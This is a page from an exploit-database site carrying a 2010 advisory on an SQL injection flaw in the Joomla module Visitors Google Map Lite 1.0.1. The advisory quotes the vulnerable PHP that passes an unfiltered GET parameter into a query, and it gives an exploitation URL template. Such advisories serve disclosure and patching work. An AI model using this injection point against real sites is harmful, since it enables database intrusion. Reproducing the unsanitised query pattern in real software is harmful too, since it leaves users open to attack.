0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection
[==================================================================
Visitors Google Map Lite 1.0.1 mod_visitorsgooglemap SQL Injection
==================================================================
- Discovered by : Chip D3 Bi0s
- Email : chipdebios[at]gmail[dot]com
- Group : LatinHackTeam
- Date : 2010-09-08
- Where : From Remote
-------------------------------------------------------------------------------------
Affected software description
Application : Visitors Google Map Lite 1.0.1 (FREE) (module:mod_visitorsgooglemap)
Developer : Serdar Gökkus
Compatibility : Joomla 1.5 Native
License : GPLv2 or later
Date Added : Sunday August 29, 2010 01:14:14
Download : http://www.comlantis.com/download/doc_download/2-visitors-google-map-lite-101-free.html
I. BACKGROUND
This extension tracks visitors of your site in real time and displays their
locations in Google Map. It uses three main technologies:
- Map API of Google
- AJAX
- IP geolocation API of IPInfoDB
Content of VisitorsGoogeMap Package:
This extension contains one Joomla Compoment and two Joomla Modules.
com_visitorsgooglemap: This component is responsible for the creation
database table during installation and remove
it clearly in case of uninstallation.
mod_visitorsgooglemap: This module is responsible for the display of
Google Map in desired module position in your
template and track the visitors of your Joomla
page in the map.
mod_visitorsgooglemap_agent: This module is responsible for the updating
visitors information in the database.
II. DESCRIPTION
Some sql injecton vulnerabilities exist in mod_visitorsgooglemap module .
III. ANALYSIS
The bug is in the following files, specifying the lines
/mod_visitorsgooglemap/map_data.php
[16] [if ($_GET['action'] == 'listpoints')
[17] {
[18] $lastMarkerID = $_GET['lastMarkerID'];
[19] ini_set('default_mimetype','text/xml'); // manchmal notwendig
[20] header ('Content-Type: text/xml'); // reicht nicht immer
[21] echo '<?xml version="1.0" ?>';
[22] echo '<xmlresponse>';
[23] $database =& JFactory::getDBO();
[24] $query = "SELECT * FROM #__visitorsgooglemap_location where id > $lastMarkerID order by id";
Explanation:As noted in the line [24] $ lastMarkerID
nowhere is filtered, which result in a query pede unexpected
IV. EXPLOITATION
http://site/path/modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0{sql}
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# 0day.today [2024-09-28] #